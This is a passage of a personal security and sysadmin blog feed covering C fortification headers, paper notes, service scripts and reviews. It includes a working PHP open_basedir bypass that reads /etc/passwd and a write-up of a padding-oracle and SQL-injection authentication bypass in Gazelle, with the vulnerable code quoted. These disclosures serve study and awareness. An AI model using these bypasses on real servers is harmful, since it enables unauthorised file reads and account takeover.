+<li>Added a ton of tests, with <a href="https://jvoisin.github.io/fortify-headers/">around 90% of coverage</a></li>
+<li>Made use of <code>__builtin_dynamic_object_size</code> when <code>FORTIFY_SOURCE=3</code> is used,
+ instead of <code>__builtin_object_size</code>.</li>
+<li>Made use of <a href="https://clang.llvm.org/docs/AttributeReference.html">attributes</a>:
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#alloc-size">alloc_size</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-as-builtin">diagnose_as_builtin</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-if">diagnose_if</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#format">format</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#malloc">malloc</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#nodiscard-warn-unused-result">warn_unused_result</a>,
+ …</li>
+<li>Added some missing functions, like <code>calloc</code>, <code>fdopen</code>, <code>fmemopen</code>, <code>fprintf</code>,
+ <code>malloc</code>, <code>memchr</code>, <code>popen</code>, <code>printf</code>, <code>qsort</code>, <code>umask</code>, …</li>
+<li>Added continuous integration, both on clang and gcc, covering the whole range
+ of supported versions across the latest Ubuntu LTS.</li>
+</ul>
+<h2>Implementation details</h2>
+<p>Since this is a pretty uncommon piece of software, friends of mine have been
+asking me details about the involved black magic.
+While it's possible to overload functions with the
+<a href="https://clang.llvm.org/docs/AttributeReference.html#overloadable">overloadable</a>
+attribute in C, there isn't really something similar for drive-by overloading.
+Fortunately, it's possible to hack an equivalent by combining
+<a href="https://gcc.gnu.org/onlinedocs/cpp/Wrapper-Headers.html"><code>#include_next</code></a> with
+the following macros:</p>
+<div class="codehilite"><pre><span></span><code><span class="cp">#define _FORTIFY_STR(s) #s</span>
+<span class="cp">#define _FORTIFY_ORIG(p, fn) __typeof__(fn) __orig_##fn __asm__(_FORTIFY_STR(p) #fn)</span>
+<span class="cp">#define _FORTIFY_FNB(fn) _FORTIFY_ORIG(__USER_LABEL_PREFIX__, fn)</span>
+<span class="cp">#define _FORTIFY_FN(fn) _FORTIFY_FNB(fn); _FORTIFY_INLINE</span>
+</code></pre></div>
+
+<p>This makes the original function available when prefixed with <code>__orig</code>,
+while allowing overloading.
+On clang, the <a href="https://clang.llvm.org/docs/AttributeReference.html#pass-object-size-pass-dynamic-object-size"><code>pass_object_size</code>/<code>pass_dynamic_object_size</code></a>
+attribute is used to pass down arguments size; the assembly label preventing
+weird <a href="https://en.wikipedia.org/wiki/Name_mangling">mangling</a> issues. Since
+it's only a label, despite being assembly, it's still portable across various
+architectures. The <code>_FORTIFY_INLINE</code> macro contains as many "please inline this
+function" directives as possible, to avoid polluting the symbols.</p>
+<p>There is of course a ton of <code>#ifdef</code>/<code>#if __has_attribute</code>/… to work around various
+compiler intrinsics, like clang missing <code>__builtin_va_arg_pack</code> or gcc missing
+<code>diagnose_if</code>, so that fortify-headers will always make use of the most
+features available.</p>
+<p>It is indeed a particularly gross pile of hacks,
+but this is C, also known as "nice things and why we can't have them."</p>
+<p>Thanks to <a href="https://u.2f30.org/sin/">sin</a> for creating the project and
+maintaining it for years, <a href="https://daniel.micay.dev">strcat</a> for his inspiring
+work on fortifying <a href="https://en.wikipedia.org/wiki/Bionic_(software)">bionic</a>,
+<a href="https://github.com/q66">q66</a> for his clang patches and general support,
+the friendly people from <a href="https://2f30.org">2f30</a> for their patience,
+<a href="http://serge.liyun.free.fr/serge/">Serge Sans Paille</a> for his <a href="https://github.com/serge-sans-paille/fortify-test-suite">testsuite</a>,
+<a href="https://people.freebsd.org/~kevans/">kevans</a> for his work on fortifying
+<a href="https://reviews.freebsd.org/D32306">FreeBSD's libc</a>,
+Red Hat for pushing <code>FORTIFY_SOURCE=2</code> and <code>FORTIFY_SOURCE=3</code> forward,
+...</p>jvoisinTue, 12 Dec 2023 23:30:00 +0100tag:dustri.org,2023-12-12:/b/fortify-headers-20.htmlsecurityPaper notes: CryptOpthttps://dustri.org/b/paper-notes-cryptopt.html<ul>
+<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
+<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
+<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
+</ul>
+<p>Cryptography is hard, high-performance one even more so: formal proof of
+assembly implementations is horrible to model, and code generated from
+formal proofs is hard to lower to high-performance assembly. The core idea of
+CryptOpt is to treat this as a black box combinatorial optimization problem,
+and bruteforce possible solutions in a smart way against an oracle.</p>
+<p>More precisely:</p>
+<ol>
+<li>start from a known-correct implementation in
+ <a href="https://github.com/mit-plv/fiat-crypto">fiat-crypto</a> (a
+ coq-powered high-level to low-level IR proven translator) low-level IR;</li>
+<li>lower it via a fuzzer-like machinery replacing/reordering operands
+ applying semantics-and-data-constraints-preserving transformations, which has an acceptable
+ search space because:<ul>
+<li>it's straight-line no-aliasing constant-offset-pointers assembly;</li>
+<li>transformations can be templatised, eg. <code>add ≍ clc; adcx</code>;</li>
+</ul>
+</li>
+<li>lift the resulting x64 assembly to fiat-crypto low-level IR;</li>
+<li>use a custom <a href="https://en.wikipedia.org/wiki/E-graph">e-graph</a> based
+ <em>equivalence checker</em> implemented as a mix between an SMT solver and a symbolic-execution engine;</li>
+<li>if the new implementation is correct, benchmark it against the current
+ fastest one, and keep it if it's outperforming it;</li>
+<li><code>goto 2</code>.</li>
+</ol>
+<p>This approach has a couple of advantages:</p>
+<ul>
+<li>fuzzers are cheaper than highly specialised engineering time</li>
+<li>porting implementations to new hardware is simply a matter of
+ running CryptOpt on it.</li>
+<li>by lifting the assembly to fiat-crypto low-level IR,
+ there is no need to write complex formal proofs,
+ since fiat-crypto is already taking care of those.</li>
+<li>controlling the mutations allows to ensure that
+ the implementation stays side-channel free.</li>
+</ul>
+<p>The main issue though, is that one needs to formally implement
+whatever algorithm to optimize in fiat-crypto, which is not that easy (and
+which the authors of the paper didn't do for libsecp256k1).</p>
+<p>Implementation-wise, the authors ran 200k mutations, with 20 initial candidates,
+over 18 Fiat IR primitives, taking between 20 and 40 CPU hours. Interestingly,
+since the equivalence-based verification is <em>slow</em> (between 0.1s and ~300s),
+it's only done once at the end. They found out that "optimization progress is roughly logarithmic
+in the number of mutations." CryptOpt generates code around 1.20 to 2.50 times
+faster than gcc/clang for the same fiat-crypto generated C code. It's not
+faster than OpenSSL (but offers formally verified correctness), but is
+faster than libsecp256k1.</p>
+<p>The paper was <a href="https://iacr.org/submit/files/slides/2023/rwc/rwc2023/85/slides.pdf">presented</a> at <a href="https://rwc.iacr.org/2023/program.php">Real World Crypto 2023</a>,
+and like all good ones, it came with an <a href="https://github.com/0xADE1A1DE/CryptOpt">implementation</a></p>jvoisinFri, 01 Dec 2023 12:30:00 +0100tag:dustri.org,2023-12-01:/b/paper-notes-cryptopt.htmlpaper_notesManaging a bouncer via OpenRChttps://dustri.org/b/managing-a-bouncer-via-openrc.html<p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
+user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
+<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
+tend to only work when one is connected, they're both running inside a
+<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
+<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
+But now that my hypervisor is automatically rebooting to apply security updates,
+and during power cuts via <a href="https://networkupstools.org/">nut</a>,
+I needed a way to automatically restart the bouncer. Since
+it's running in an <a href="https://www.alpinelinux.org/">Alpine Linux</a> container,
+here is my solution in the form of an <a href="https://github.com/OpenRC/openrc">OpenRC</a>
+service script, because I couldn't find one on the internet:</p>
+<div class="codehilite"><pre><span></span><code><span class="ch">#!/sbin/openrc-run</span>
+
+<span class="nv">USER</span><span class="o">=</span>jvoisin
+
+<span class="nv">name</span><span class="o">=</span><span class="s2">"chat"</span>
+<span class="nv">command_user</span><span class="o">=</span><span class="s2">"</span><span class="nv">$USER</span><span class="s2">"</span>
+<span class="nv">command</span><span class="o">=</span>/usr/bin/tmux
+<span class="nv">command_args</span><span class="o">=</span><span class="s2">"new-session -s chat -d '/usr/bin/weechat' \; new-window '/usr/bin/profanity' \; select-window -t -1"</span>
+<span class="nv">pidfile</span><span class="o">=</span><span class="s2">"/run/</span><span class="nv">$SVCNAME</span><span class="s2">.pid"</span>
+
+depend<span class="o">()</span><span class="w"> </span><span class="o">{</span>
+<span class="w"> </span>need<span class="w"> </span>net
+<span class="w"> </span>use<span class="w"> </span>dns<span class="w"> </span>
+<span class="o">}</span><span class="w"> </span>
+
+stop<span class="o">()</span><span class="w"> </span><span class="o">{</span>
+<span class="w"> </span>su<span class="w"> </span><span class="s2">"</span><span class="nv">$USER</span><span class="s2">"</span><span class="w"> </span>-c<span class="w"> </span><span class="s1">'tmux kill-session chat'</span>
+<span class="o">}</span>
+</code></pre></div>jvoisinFri, 24 Nov 2023 16:30:00 +0100tag:dustri.org,2023-11-24:/b/managing-a-bouncer-via-openrc.htmlsysadminNetra - Ingratshttps://dustri.org/b/netra-ingrats.html<p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
+<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
+Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
+depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren & der Club of
+Gore</a> in equal
+measures, bound together with a hint of depressive darkwave, resulting
+in a not only surprisingly cohesive and daring record, but also an excessively
+pleasant and honest one.</p>
+<p>Opening with "Gimme a break", a mellow jazzy noir blues vibe where one wants to
+snap in rhythm, things quickly devolve into blast beats, raw screams and
+twisted guitar of "Everything’s Fine", arguably the most black-metal-esque song
+of the album. Albeit it is way more than yet-another-black-metal-track,
+morphing into something more complex, with an eerie piano melody, and some
+almost gothic rock clear singing. The sudden transitions are perfectly
+executed, and the work on the voices is truly delicious, resulting in an
+alienating, impetuous yet melancholic track. "Underneath my words the ruins of
+yours" is a subtle mix of trip-hop and atmospheric post-rock/darkwave,
+pursuing with "Live with It", even more trip-hop, but this time with a
+<a href="https://en.wikipedia.org/wiki/Syncopation">syncopated</a> rhythm, 80s gothic
+rock, clean vocals and acoustic guitars, … it results in something like
+Katatonia doing a feat with <a href="https://en.wikipedia.org/wiki/Gramatik">Gramatik</a>
+and <a href="https://en.wikipedia.org/wiki/Ulver">Ulver</a> period early 2000s.</p>
+<p>Then the calm before the storm, "Infinite boredom", a one minute interlude of grainy piano under the rain,
+announcing "Don't Keep Me Waiting", some sort of nihilist black metal track,
+but with the noted presence of a saxophone and some clear touches of jazz. The presence of a whispered sample
+from <a href="https://en.wikipedia.org/wiki/The_Minister">L’exercice de l’État</a>
+has a gentle touch of <a href="https://www.metal-archives.com/bands/B%C3%A2%27a/3540445572">Ba'a</a>. Moving on
+to "A Genuinely Benevolent Man", starting with synthesisers,
+then a 4|4 kick resulting in something that could be on a <a href="https://en.wikipedia.org/wiki/VNV_Nation">VNV Nation</a> album.
+Until it decays into something more raw, and when the shrieking vocals
+are showing up, you didn't even realise that we've left the world of the darkwave
+to return into the one of black metal.</p>
+<p>"Paris or Me", dark and rainy, with bits of trip-hop percussion,
+introducing "Could've, Should've, Would've", with tasteful hints of Depeche Mode, Dead Can Dance,
+post-2000 Velvet Acid Christ, giving it a resolute tasteful darkwave-synth-pop-EBM
+cocktail. The album ends with "Jusqu'au-boutiste", starting with some jazzy piano on a <a href="https://en.wikipedia.org/wiki/Bassline#Walking_bass">walking
+bass</a>, turning into an ultra-saturated tremolo riff with blast beats,
+and both worlds are alternating along the track, only interrupted by a very à
+propos sample from <a href="https://en.wikipedia.org/wiki/Low_Down">Low Down</a>. It goes
+on until the piano gets creepier and creepier, landing into strings,
+morphing into dislocated trip-hop soul, beaching onto calm synthesisers,
+and ending with raw black metal as background for electronic sounds.</p>
+<p>As <a href="https://hypnoticdirgerecords.com/">Hypnotic Dirge Records</a>, the label on which the disc was produced, perfectly
+summarised:</p>
+<blockquote>
+<p>The perfect soundtrack for late-night walks in the city. The material on
+“Ingrats” is an all-out assault on the senses, a bitter pill that must be
+swallowed as an accompaniment for self-reflection. An album which can connect
+emotionally and leave you drained at the end.</p>
+</blockquote>jvoisinSat, 18 Nov 2023 22:45:00 +0100tag:dustri.org,2023-11-18:/b/netra-ingrats.htmlmusicini_set based open_basedir bypasshttps://dustri.org/b/ini_set-based-open_basedir-bypass.html<p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
+by being the expected solution for his
+<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
+for InsomniHack Finals 2019, but has been known long before.</p>
+<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
+<blockquote>
+<p>When a script tries to access the filesystem, for example using include,
+or fopen(), the location of the file is checked. When the file is outside the
+specified directory-tree, PHP will refuse to access it. All symbolic links are
+resolved, so it's not possible to avoid this restriction with a symlink. If the
+file doesn't exist then the symlink couldn't be resolved and the filename is
+compared to (a resolved) open_basedir. </p>
+<p>[…]</p>
+<p>open_basedir is just an extra safety net, that is in no way comprehensive, and can therefore not be relied upon when security is needed. </p>
+</blockquote>
+<p>It has been more or less fixed in <a href="https://github.com/php/php-src/commit/ee9e07541f9f07762e3ee781102eea3a4190787c">March 2021</a>,
+then again in <a href="https://github.com/php/php-src/commit/61e98bf35eb939bdd7b27ad7938f8549db2e1551">March 2023</a>,
+and again in <a href="https://github.com/php/php-src/commit/9bcdf219ec6e8d6c2a55f1712b7d868b9129ef8d">July 2023</a>.
+But I wouldn't be surprised if more low-hanging bypasses were lurking ;)</p>
+<p>The crux of the bypass is that php didn't resolve relative paths both in
+<code>ini_set</code> and when checking <code>php_check_open_basedir</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="o"><?</span><span class="nx">php</span>
+<span class="k">echo</span> <span class="nb">ini_get</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">);</span> <span class="c1">// /var/www/html</span>
+<span class="nb">mkdir</span><span class="p">(</span><span class="s1">'./tmp'</span><span class="p">);</span>
+<span class="nb">chdir</span><span class="p">(</span><span class="s1">'./tmp'</span><span class="p">);</span>
+<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">,</span> <span class="s1">'..'</span><span class="p">);</span>
+<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nv">$i</span> <span class="o"><=</span> <span class="mi">24</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
+ <span class="nb">chdir</span><span class="p">(</span><span class="s1">'..'</span><span class="p">);</span>
+<span class="p">}</span>
+<span class="nb">ini_set</span><span class="p">(</span><span class="s1">'open_basedir'</span><span class="p">,</span><span class="s1">'/'</span><span class="p">)</span>
+<span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/etc/passwd"</span><span class="p">);</span>
+</code></pre></div>jvoisinFri, 03 Nov 2023 16:30:00 +0100tag:dustri.org,2023-11-03:/b/ini_set-based-open_basedir-bypass.htmlphpBook review: Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Crackinghttps://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html<p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
+<p>I'm starting to feel guilty about getting ebooks for free from
+<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
+send them my way in exchange for a review, so I won't complain.</p>
+<p>Anyway, I got a copy of the early access version of <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
+Impressioning, and Safe Cracking</a>!
+It's obviously a book about lockpicking, but, as <em>hinted</em> by its name,
+from the <a href="https://www.lockwiki.com/index.php/Locksport">sport</a> angle.</p>
+<p>I'm not completely clueless when it comes to picking locks, but I've always been
+mediocre at best, since I never really put the effort into practising anything
+but the basics. This was thus a great opportunity for a deeper dive!
+So I got myself a <a href="https://covertinstruments.com/collections/lockpicks/products/genesis-lock-pick">proper set of picks</a>,
+3 cutaway training locks: <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-serrated-pins">one with serrated pins</a>,
+<a href="https://www.sparrowslockpicks.com/products/cut-away-lock-spool-pins">with spool pins</a>,
+and <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-check-pins">one with stupid chess pieces pins</a>,
+and a couple of locks/padlocks from my local locksmith, and dove into the book!</p>
+<p>I was a bit curious about its content, since I didn't bother reading the table of contents,
+and was expecting a pile of techniques to open <a href="https://en.wikipedia.org/wiki/Wafer_tumbler_lock">wafer tumbler locks</a>
+in the fastest way possible. But the book is so much more than that, with
+historical perspectives, a bit of legalese, the proper etiquette to participate in lockpicking
+competitions and how to organise one, anecdotes, mechanical details and
+resources for those who <a href="https://en.wikipedia.org/wiki/Starship_Troopers_(film)">would like to know
+more</a>, how to tear
+apart, modify, take care of, and reassemble locks, where to get equipment,
+how to <a href="https://www.lockwiki.com/index.php/Impressioning">impression keys</a>,
+details on <a href="https://en.wikipedia.org/wiki/Lever_tumbler_lock">lever tumbler locks</a>
+and <a href="https://en.wikipedia.org/wiki/Safe">vaults</a>,
+…</p>
+<p>The part about wafer locks, while interesting, doesn't really go much further
+than some basic techniques for entry-level <a href="https://lockwiki.com/index.php/Security_pin#Security_pin_illustrations">security pins</a>,
+but I guess practice is the only way to learn how to handle anything non-trivial anyway.
+On the other hand, the part about lever locks was highly entertaining,
+since those are really weird compared to the <em>usual</em> locks,
+and I didn't know much about them.</p>
+<p>I recently gifted myself a <a href="https://www.sparrowslockpicks.com/products/challenge-vault">Sparrow's challenge vault</a> for my birthday,
+and was thus highly delighted to discover that the book has a whole section
+on <a href="https://en.wikipedia.org/wiki/Safe-cracking">safe manipulation</a>; which is
+fortunate since the instructions coming with the vault are <s>pure garbage</s>
+confusing at best.</p>
+<p>The only issue I had with the book is that while it's full of gorgeous colourful
+pictures, like the small marks left by pins during key impressioning,
+they are unfortunately barely legible on my
+<a href="https://www.pocketbook-int.com/ge/products/pocketbook-inkpad-3">Pocketbook InkPad 3</a>,
+so I'd recommend getting the paperback version if you don't have a 𝖙𝖗𝖚𝖊𝖈𝖔𝖑𝖔𝖗 4𝖐
+𝕳𝕯𝕽 e-reader.</p>
+<p>All in all, it's a really great self-contained book for newcomers and beginners,
+entertaining, detailed, … and doing a tremendous job at making
+lockpicking competitions look cool yet accessible! It was also a nice motivation booster for me to
+tackle harder locks.</p>
+<p>If you already know your way around locks, you might want to look at <a href="https://www.barnesandnoble.com/w/high-security-mechanical-locks-graham-pulford/1111341233">High-Security Mechanical Locks: An
+Encyclopedic
+Reference</a> instead.</p>jvoisinFri, 20 Oct 2023 18:00:00 +0200tag:dustri.org,2023-10-20:/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.htmlbook_reviewsAuthentication bypass on What.CD's Gazellehttps://dustri.org/b/authentication-bypass-on-whatcds-gazelle.html<p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
+hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
+is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
+their "web framework geared towards private BitTorrent tracker" anymore.
+I've been sitting on this one for years, I know I wasn't the only one,
+and it's not the only low-hanging vulnerability lurking there.</p>
+<p>Rolling your own blunt is alright, rolling your own authentication scheme
+less so: there is a trivial <a href="https://en.wikipedia.org/wiki/Padding_oracle_attack">padding oracle</a>
+in the <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/encrypt.class.php#L24">homegrown crypto scheme</a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="k">public</span> <span class="k">function</span> <span class="nf">decrypt</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">,</span> <span class="nv">$Key</span> <span class="o">=</span> <span class="nx">ENCKEY</span><span class="p">)</span> <span class="p">{</span>
+ <span class="k">if</span> <span class="p">(</span><span class="nv">$CryptStr</span> <span class="o">!=</span> <span class="s1">''</span><span class="p">)</span> <span class="p">{</span>
+ <span class="nv">$IV</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span>
+ <span class="nv">$CryptStr</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">16</span><span class="p">);</span>
+ <span class="k">return</span> <span class="nb">trim</span><span class="p">(</span><span class="nb">mcrypt_decrypt</span><span class="p">(</span><span class="nx">MCRYPT_RIJNDAEL_128</span><span class="p">,</span> <span class="nv">$Key</span><span class="p">,</span> <span class="nv">$CryptStr</span><span class="p">,</span> <span class="nx">MCRYPT_MODE_CBC</span><span class="p">,</span> <span class="nv">$IV</span><span class="p">));</span>
+ <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
+ <span class="k">return</span> <span class="s1">''</span><span class="p">;</span>
+ <span class="p">}</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>leading to an <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/ajax_start.php#L23-L31">authentication bypass via a SQL injection</a>:</p>
+<div class="codehilite"><pre><span></span><code><span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'session'</span><span class="p">]))</span> <span class="p">{</span>
+ <span class="nv">$LoginCookie</span> <span class="o">=</span> <span class="nv">$Enc</span><span class="o">-></span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">'session'</span><span class="p">]);</span>
+<span class="p">}</span>
+<span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">))</span> <span class="p">{</span>
+ <span class="k">list</span><span class="p">(</span><span class="nv">$SessionID</span><span class="p">,</span> <span class="nv">$UserID</span><span class="p">)</span> <span class="o">=</span> <span class="nb">explode</span><span class="p">(</span><span class="s2">"|~|"</span><span class="p">,</span> <span class="nv">$Enc</span><span class="o">-></span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">));</span>
+
+ <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$UserID</span> <span class="o">||</span> <span class="o">!</span><span class="nv">$SessionID</span><span class="p">)</span> <span class="p">{</span>
+ <span class="k">die</span><span class="p">(</span><span class="s1">'Not logged in!'</span><span class="p">);</span>
+ <span class="p">}</span>
+
+ <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$Enabled</span> <span class="o">=</span> <span class="nv">$Cache</span><span class="o">-></span><span class="na">get_value</span><span class="p">(</span><span class="s2">"enabled_</span><span class="si">$UserID</span><span class="s2">"</span><span class="p">))</span> <span class="p">{</span>
+ <span class="k">require</span><span class="p">(</span><span class="nx">SERVER_ROOT</span><span class="o">.</span><span class="s1">'/classes/mysql.class.php'</span><span class="p">);</span> <span class="c1">//Require the database wrapper</span>
+ <span class="nv">$DB</span> <span class="o">=</span> <span class="k">NEW</span> <span class="nx">DB_MYSQL</span><span class="p">;</span> <span class="c1">//Load the database wrapper</span>
+ <span class="nv">$DB</span><span class="o">-></span><span class="na">query</span><span class="p">(</span><span class="s2">"</span>
+<span class="s2"> SELECT Enabled</span>
+<span class="s2"> FROM users_main</span>
+<span class="s2"> WHERE ID = '</span><span class="si">$UserID</span><span class="s2">'"</span><span class="p">);</span>
+ <span class="k">list</span><span class="p">(</span><span class="nv">$Enabled</span><span class="p">)</span> <span class="o">=</span> <span class="nv">$DB</span><span class="o">-></span><span class="na">next_record</span><span class="p">();</span>
+ <span class="nv">$Cache</span><span class="o">-></span><span class="na">cache_value</span><span class="p">(</span><span class="s2">"enabled_</span><span class="si">$UserID</span><span class="s2">"</span><span class="p">,</span> <span class="nv">$Enabled</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
+ <span class="p">}</span>
+<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
+ <span class="k">die</span><span class="p">(</span><span class="s1">'Not logged in!'</span><span class="p">);</span>
+<span class="p">}</span>
+</code></pre></div>
+
+<p>Conveniently, the oracle doesn't touch the database, is completely stateless,
+and only shows up in the httpd/reverse-proxy's logs, which shouldn't log the cookies'
+content, making forensic analysis nigh impossible. Once you're admin, there are
+a bunch of available SQL injections, like in
+<a href="https://github.com/WhatCD/Gazelle/blob/master/sections/reportsv2/takeresolve.php"><code>takeresolve.php</code></a>.
+From there, remote code execution is doable, but left as an exercise for the
+reader.</p>jvoisinFri, 13 Oct 2023 19:45:00 +0200tag:dustri.org,2023-10-13:/b/authentication-bypass-on-whatcds-gazelle.htmlsecurityVideo acceleration in Jellyfin inside a Proxmox containerhttps://dustri.org/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.html<p>For various reasons, including "video decoding is hard", "your web browser hates you"
+and "watching movies on a phone over 3G is a basic human necessity",
+enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
+is a desirable goal if you don't want your CPU to set your house on fire. </p>
+<p>To attain it, one can mess around with <a href="https://github.com/ddimick/proxmox-lxc-idmapper">cryptic gid mappings</a>,
+but granting every user on the hypervisor the right to read/write <code>/dev/dri/renderD128</code> and
+<code>/dev/dri/card0</code> is way easier, and it looks like this:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>><span class="w"> </span>/etc/udev/rules.d/99-intel-chmod666.rules<span class="w"> </span><<<span class="w"> </span><span class="s1">'EOF'</span>
+<span class="go">KERNEL=="renderD128", MODE="0666"</span>
+<span class="go">KERNEL=="card0", MODE="0666"</span>
+<span class="go">EOF</span>
+<span class="gp"># </span>udevadm<span class="w"> </span>control<span class="w"> </span>--reload-rules<span class="w"> </span><span class="o">&&</span><span class="w"> </span>udevadm<span class="w"> </span>trigger
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>It doesn't really worsen security, since:
+- the devices are only mounted inside my jellyfin container, which would have
+ the same privileges as if I used gid mapping.
+- odds are that an attacker able to get a shell on the hypervisor wouldn't
+ really need to have r/w access to the two devices to escalate their
+ privileges anyway, since they would either be:
+ - root already to escape from a container
+ - root already to escape from a vm
+ - whatever proxmox user and likely able to escalate to <code>root</code> trivially
+ - other users are sandboxed via systemd and/or seccomp.</p>
+<p>Speaking of mounting things inside the container:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>><span class="w"> </span>/etc/pve/lxc/114.conf<span class="w"> </span><<<span class="w"> </span><span class="s1">'EOF'</span>
+<span class="go">lxc.cgroup2.devices.allow: c 226:0 rwm</span>
+<span class="go">lxc.cgroup2.devices.allow: c 226:128 rwm</span>
+<span class="go">lxc.mount.entry: /dev/dri dev/dri none bind,optional,create=dir</span>
+<span class="go">lxc.mount.entry: /dev/dri/renderD128 dev/renderD128 none bind,optional,create=file</span>
+<span class="go">EOF</span>
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>You can now run <code>vainfo</code> inside the container and be delighted by the
+presence of the <a href="https://en.wikipedia.org/wiki/Video_Acceleration_API">VA-API</a> version number:</p>
+<div class="codehilite"><pre><span></span><code><span class="gp"># </span>vainfo<span class="w"> </span><span class="m">2</span>>/dev/null<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">1</span>
+<span class="go">libva info: VA-API version 1.17.0</span>
+<span class="gp">#</span>
+</code></pre></div>
+
+<p>The last step is to tick all the boxes in <a href="https://jellyfin.org/docs/general/administration/hardware-acceleration/">Jellyfin's
+preferences</a>
+and you're good to go. Don't forget to make some space on the disk for the
+transcoding cache, at least until <a href="https://github.com/jellyfin/jellyfin/pull/8744">this</a>
+makes its way into a release.</p>jvoisinSun, 01 Oct 2023 22:15:00 +0200tag:dustri.org,2023-10-01:/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.htmlsysadminPaper notes: Breaking Bad: Quantifying the Addiction of Web Elements to JavaScripthttps://dustri.org/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.html<p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
+<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
+will at some point contain the following line: "No, javascript isn't disabled
+by default because too many sites would break. You can always crank the
+security slider all the way up if you want tho."</p>
+<p>We all agree that javascript enables all sorts of despicable behaviours making
+the web a nightmare-material privacy/security cesspit and completely
+inscrutable to a lot of users, so having research done
+to quantify how to make it a better place for everyone is always more than welcome.</p>
+<p>The main idea of the paper is to load pages from the <a href="https://hispar.cs.duke.edu/">Hispar
+set</a> with and without <code>javascript.enabled</code> set,
+via <a href="https://pptr.dev">Puppeteer</a>, and to perform
